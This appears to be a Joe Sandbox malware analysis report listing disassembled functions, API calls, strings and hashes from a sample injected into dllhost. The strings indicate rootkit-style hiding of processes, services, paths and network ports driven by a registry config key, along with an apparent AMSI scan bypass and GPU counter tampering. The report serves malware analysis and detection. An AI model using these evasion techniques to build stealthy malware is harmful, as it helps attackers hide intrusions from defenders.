Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
String ID:
API String ID: 3805535264-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000017C6DD72FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017C6DD73094
lstrlenW.KERNEL32 ref: 0000017C6DD732BE

Part of subcall function 0000017C6DD71A30: OpenProcess.KERNEL32 ref: 0000017C6DD71A56
Part of subcall function 0000017C6DD71A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000017C6DD71A74
Part of subcall function 0000017C6DD71A30: PathFindFileNameW.SHLWAPI ref: 0000017C6DD71A83
Part of subcall function 0000017C6DD71A30: lstrlenW.KERNEL32 ref: 0000017C6DD71A8F
Part of subcall function 0000017C6DD71A30: StrCpyW.SHLWAPI ref: 0000017C6DD71AA2
Part of subcall function 0000017C6DD71A30: CloseHandle.KERNEL32 ref: 0000017C6DD71AB0

GetProcAddress.KERNEL32 ref: 0000017C6DD730A9

Part of subcall function 0000017C6DD73F88: StrCmpNIW.SHLWAPI(?,?,?,0000017C6DD7272F), ref: 0000017C6DD73FA0

StrCmpNIW.SHLWAPI ref: 0000017C6DD730EC
lstrlenW.KERNEL32 ref: 0000017C6DD73214

Strings

NtQueryObject, xrefs: 0000017C6DD7309F
ntdll.dll, xrefs: 0000017C6DD7308D
\Device\Nsi, xrefs: 0000017C6DD730DF

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: d6c81914a687e9810629ea9cb3824d4885e1bf87798c2346bd6c6c8bc810511e
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: EDB168322186A086EF65AF66D8807E9A3B5F745B84F54505AFF2D53BA4DE35CCC0C3A0

Function 0000017C6DD7CD80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000017C6DD7CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000017C6DD7CE23
RtlVirtualUnwind.NTDLL ref: 0000017C6DD7CE5E
IsDebuggerPresent.KERNEL32 ref: 0000017C6DD7CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017C6DD7CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000017C6DD7CEAC

Strings

\t9"1, xrefs: 0000017C6DD7CD9D

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: \t9"1
API String ID: 1239891234-2818780629
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 666eb60b3e50730722908edb228c588d86988610cb9934d5a8f7b5ca73210e75
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: C2413B36218B8086EB60DF25E8807EE73B4F788798F50011AEB9D46B98DF78C5D5CB50

Function 0000017C6DD784B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000017C6DD784CC
RtlCaptureContext.NTDLL ref: 0000017C6DD784F9
RtlLookupFunctionEntry.NTDLL ref: 0000017C6DD78513
RtlVirtualUnwind.NTDLL ref: 0000017C6DD78554
IsDebuggerPresent.KERNEL32 ref: 0000017C6DD785A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017C6DD785C5
UnhandledExceptionFilter.KERNEL32 ref: 0000017C6DD785D0

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 88e2dad57461687df2457b63b2f7ee3e05eec3179c6ef57ae21b8df1d51bcd42
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: A6311972209B8086EB61AF60E8807EE7375F788748F44442AEB4E47B94DF78C5C88760

Function 0000017C6DD7DA18 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000017C6DD7DB99
FindNextFileW.KERNEL32 ref: 0000017C6DD7DCCF
FindClose.KERNEL32 ref: 0000017C6DD7DD0F
FindClose.KERNEL32 ref: 0000017C6DD7DD3B

Strings

\t9"1, xrefs: 0000017C6DD7DA32

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID: \t9"1
API String ID: 1164774033-2818780629
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 020828e7fca0e5349b8ab346584f93e7df2ba306c29cc8d1b83f1c8d767b2d68
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: B0A1B43270868089FF21AB75A8C03ED6BB1A7C5794F144159BF9D27B99DA34C4C2C760

Function 0000017C6DD71724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017C6DD7172F
HeapAlloc.KERNEL32 ref: 0000017C6DD7173E

Part of subcall function 0000017C6DD71264: GetProcessHeap.KERNEL32 ref: 0000017C6DD7126A
Part of subcall function 0000017C6DD71264: HeapAlloc.KERNEL32 ref: 0000017C6DD71279
Part of subcall function 0000017C6DD71264: GetProcessHeap.KERNEL32 ref: 0000017C6DD71293
Part of subcall function 0000017C6DD71264: HeapAlloc.KERNEL32 ref: 0000017C6DD712A4

Part of subcall function 0000017C6DD71000: GetProcessHeap.KERNEL32 ref: 0000017C6DD71006
Part of subcall function 0000017C6DD71000: HeapAlloc.KERNEL32 ref: 0000017C6DD71015
Part of subcall function 0000017C6DD71000: GetProcessHeap.KERNEL32 ref: 0000017C6DD71028
Part of subcall function 0000017C6DD71000: HeapAlloc.KERNEL32 ref: 0000017C6DD71037

RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD717AE
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD717DB
RegCloseKey.ADVAPI32 ref: 0000017C6DD717F5
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD71815
RegCloseKey.ADVAPI32 ref: 0000017C6DD71830
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD71850
RegCloseKey.ADVAPI32 ref: 0000017C6DD7186B
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD7188B
RegCloseKey.ADVAPI32 ref: 0000017C6DD718A6
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD718C6
RegCloseKey.ADVAPI32 ref: 0000017C6DD718E1
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD71901
RegCloseKey.ADVAPI32 ref: 0000017C6DD7191C
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD7193C
RegCloseKey.ADVAPI32 ref: 0000017C6DD71957
RegOpenKeyExW.ADVAPI32 ref: 0000017C6DD71977
RegCloseKey.ADVAPI32 ref: 0000017C6DD71992
RegCloseKey.ADVAPI32 ref: 0000017C6DD7199C

Part of subcall function 0000017C6DD712B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000017C6DD71315
Part of subcall function 0000017C6DD712B8: GetProcessHeap.KERNEL32 ref: 0000017C6DD71323
Part of subcall function 0000017C6DD712B8: HeapAlloc.KERNEL32 ref: 0000017C6DD71334
Part of subcall function 0000017C6DD712B8: RegEnumValueW.ADVAPI32 ref: 0000017C6DD71393
Part of subcall function 0000017C6DD712B8: GetProcessHeap.KERNEL32 ref: 0000017C6DD713DB
Part of subcall function 0000017C6DD712B8: HeapAlloc.KERNEL32 ref: 0000017C6DD713E9
Part of subcall function 0000017C6DD712B8: GetProcessHeap.KERNEL32 ref: 0000017C6DD71406
Part of subcall function 0000017C6DD712B8: HeapFree.KERNEL32 ref: 0000017C6DD71414
Part of subcall function 0000017C6DD712B8: lstrlenW.KERNEL32 ref: 0000017C6DD7141D
Part of subcall function 0000017C6DD712B8: GetProcessHeap.KERNEL32 ref: 0000017C6DD7142B
Part of subcall function 0000017C6DD712B8: HeapAlloc.KERNEL32 ref: 0000017C6DD71439

Strings

tcp_local, xrefs: 0000017C6DD718FA
startup, xrefs: 0000017C6DD717D1
tcp_remote, xrefs: 0000017C6DD71935
pid, xrefs: 0000017C6DD7180E
service_names, xrefs: 0000017C6DD718BF
process_names, xrefs: 0000017C6DD71849
paths, xrefs: 0000017C6DD71884
udp, xrefs: 0000017C6DD71970
SOFTWARE\$rbx-config, xrefs: 0000017C6DD7178E

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 9b2cda23558094bc4f0273148d6e04e58685f777ffb6458f7fac070a39fa1823
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 8F71EB36314A5185EF21AF65E8E16D923B4FB84B88F402219EF4E57B68DF34C4C5C790

Function 0000017C6DD71E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000017C6DD71E7F

Part of subcall function 0000017C6DD722A8: GetModuleHandleA.KERNEL32(?,?,?,0000017C6DD71EB1), ref: 0000017C6DD722C0
Part of subcall function 0000017C6DD722A8: GetProcAddress.KERNEL32(?,?,?,0000017C6DD71EB1), ref: 0000017C6DD722D1

CreateThread.KERNEL32 ref: 0000017C6DD72043
TlsAlloc.KERNEL32 ref: 0000017C6DD72049
TlsAlloc.KERNEL32 ref: 0000017C6DD72055
TlsAlloc.KERNEL32 ref: 0000017C6DD72061
TlsAlloc.KERNEL32 ref: 0000017C6DD7206D
TlsAlloc.KERNEL32 ref: 0000017C6DD72079
TlsAlloc.KERNEL32 ref: 0000017C6DD72085

Strings

EnumServiceGroupW, xrefs: 0000017C6DD71F50
NtQuerySystemInformation, xrefs: 0000017C6DD71EA5
amsi.dll, xrefs: 0000017C6DD72019
pdh.dll, xrefs: 0000017C6DD71FD7, 0000017C6DD71FF8
NtDeviceIoControlFile, xrefs: 0000017C6DD71FB6
NtQueryDirectoryFile, xrefs: 0000017C6DD71EDF
EnumServicesStatusExW, xrefs: 0000017C6DD71F71, 0000017C6DD71F92
PdhGetRawCounterArrayW, xrefs: 0000017C6DD71FD0
NtQueryDirectoryFileEx, xrefs: 0000017C6DD71EFC
NtResumeThread, xrefs: 0000017C6DD71EC2
AmsiScanBuffer, xrefs: 0000017C6DD72012
advapi32.dll, xrefs: 0000017C6DD71F57, 0000017C6DD71F78
ntdll.dll, xrefs: 0000017C6DD71E8D
PdhGetFormattedCounterArrayW, xrefs: 0000017C6DD71FF1
NtEnumerateKey, xrefs: 0000017C6DD71F19
sechost.dll, xrefs: 0000017C6DD71F99
NtEnumerateValueKey, xrefs: 0000017C6DD71F36

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 5da42ed1ffadee920fdd3a6827ec99a349429ce9cd9eb830fba9837c9ac4c10f
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 1C518D70518A8AA5EF12FBA9ECC1BD46734A740349F80465BBA0D16765DE7882DAC3F0

Function 0000017C6DD712B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017C6DD71315
GetProcessHeap.KERNEL32 ref: 0000017C6DD71323
HeapAlloc.KERNEL32 ref: 0000017C6DD71334
RegEnumValueW.ADVAPI32 ref: 0000017C6DD71393

Part of subcall function 0000017C6DD71530: StrCmpIW.SHLWAPI ref: 0000017C6DD71561

GetProcessHeap.KERNEL32 ref: 0000017C6DD713DB
HeapAlloc.KERNEL32 ref: 0000017C6DD713E9
GetProcessHeap.KERNEL32 ref: 0000017C6DD71406
HeapFree.KERNEL32 ref: 0000017C6DD71414
lstrlenW.KERNEL32 ref: 0000017C6DD7141D
GetProcessHeap.KERNEL32 ref: 0000017C6DD7142B
HeapAlloc.KERNEL32 ref: 0000017C6DD71439
StrCpyW.SHLWAPI ref: 0000017C6DD7145B
GetProcessHeap.KERNEL32 ref: 0000017C6DD71472
HeapFree.KERNEL32 ref: 0000017C6DD71480

Strings

d, xrefs: 0000017C6DD71356

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: ac481bef8fca157afcd9683bfa9fc4cce864fdf38b681d652077e029aade8234
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 59512B32218B8496EB25DF62E4983AA77B1F788F99F444128EF4E07758DF38C0C58790

Function 0000017C6DD7EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000017C6DD7F34A,?,?,00000000,0000017C6DD7F2CD), ref: 0000017C6DD7EFF5
GetLastError.KERNEL32(?,?,00000000,0000017C6DD7F2CD), ref: 0000017C6DD7F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000017C6DD7F2CD), ref: 0000017C6DD7F049
VirtualProtect.KERNEL32 ref: 0000017C6DD7F0A5
VirtualProtect.KERNEL32 ref: 0000017C6DD7F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000017C6DD7F2CD), ref: 0000017C6DD7F11A
GetProcAddress.KERNEL32(?,?,00000000,0000017C6DD7F2CD), ref: 0000017C6DD7F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 0000017C6DD7F157, 0000017C6DD7F165
api-ms-, xrefs: 0000017C6DD7F01B
ext-ms-, xrefs: 0000017C6DD7F02E

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: a2fb5a2f819eb04b270e5b4f20cb4fabde424200cb354287f0f263076fb08f7e
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 53519E3170974451EE25BB66A8807E922B0BB48BB0F580729EF3E477D4DF38D4C587A0

Function 0000017C6DD7A22C Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000017C6DD7A289

Part of subcall function 0000017C6DD7B144: __GetUnwindTryBlock.LIBCMT ref: 0000017C6DD7B187
Part of subcall function 0000017C6DD7B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000017C6DD7B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000017C6DD7A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000017C6DD7A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000017C6DD7A6BC

Strings

\t9"1, xrefs: 0000017C6DD7A245
csm, xrefs: 0000017C6DD7A2A3
csm, xrefs: 0000017C6DD7A384
csm, xrefs: 0000017C6DD7A30A

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: \t9"1$csm$csm$csm
API String ID: 849930591-931476357
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 2306e68bd77d8186e02cf75f79763a6101b014cd4d26bff6e651f299c393dac3
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 79D15732608B808AEF20AF6594817DD77B0F745B88F102259EF8D57B9ADB38C5D1C790

Function 0000017C6DD733A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000017C6DD733FD
GetProcessHeap.KERNEL32 ref: 0000017C6DD73412
HeapAlloc.KERNEL32 ref: 0000017C6DD73420
PdhGetCounterInfoW.PDH ref: 0000017C6DD73436
StrCmpW.SHLWAPI ref: 0000017C6DD7344B

Part of subcall function 0000017C6DD73950: StrCmpNW.SHLWAPI ref: 0000017C6DD73972
Part of subcall function 0000017C6DD73950: StrStrW.SHLWAPI ref: 0000017C6DD73990
Part of subcall function 0000017C6DD73950: StrToIntW.SHLWAPI ref: 0000017C6DD739B7

GetProcessHeap.KERNEL32 ref: 0000017C6DD73488
HeapFree.KERNEL32 ref: 0000017C6DD73496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000017C6DD73444

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 6cce2b05171c319ec8ae83cc88c5a5ccd002c450ef7ec9af368a71565ff95dfe
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 42317132608B5096EB26EF12A8847E9A3B4F788B99F444569EF4D43724DF38C4D68790

Function 0000017C6DD734B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000017C6DD73516
GetProcessHeap.KERNEL32 ref: 0000017C6DD73527
HeapAlloc.KERNEL32 ref: 0000017C6DD73535
PdhGetCounterInfoW.PDH ref: 0000017C6DD7354B
StrCmpW.SHLWAPI ref: 0000017C6DD73560

Part of subcall function 0000017C6DD73950: StrCmpNW.SHLWAPI ref: 0000017C6DD73972
Part of subcall function 0000017C6DD73950: StrStrW.SHLWAPI ref: 0000017C6DD73990
Part of subcall function 0000017C6DD73950: StrToIntW.SHLWAPI ref: 0000017C6DD739B7

GetProcessHeap.KERNEL32 ref: 0000017C6DD7358D
HeapFree.KERNEL32 ref: 0000017C6DD7359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000017C6DD73559

Memory Dump Source

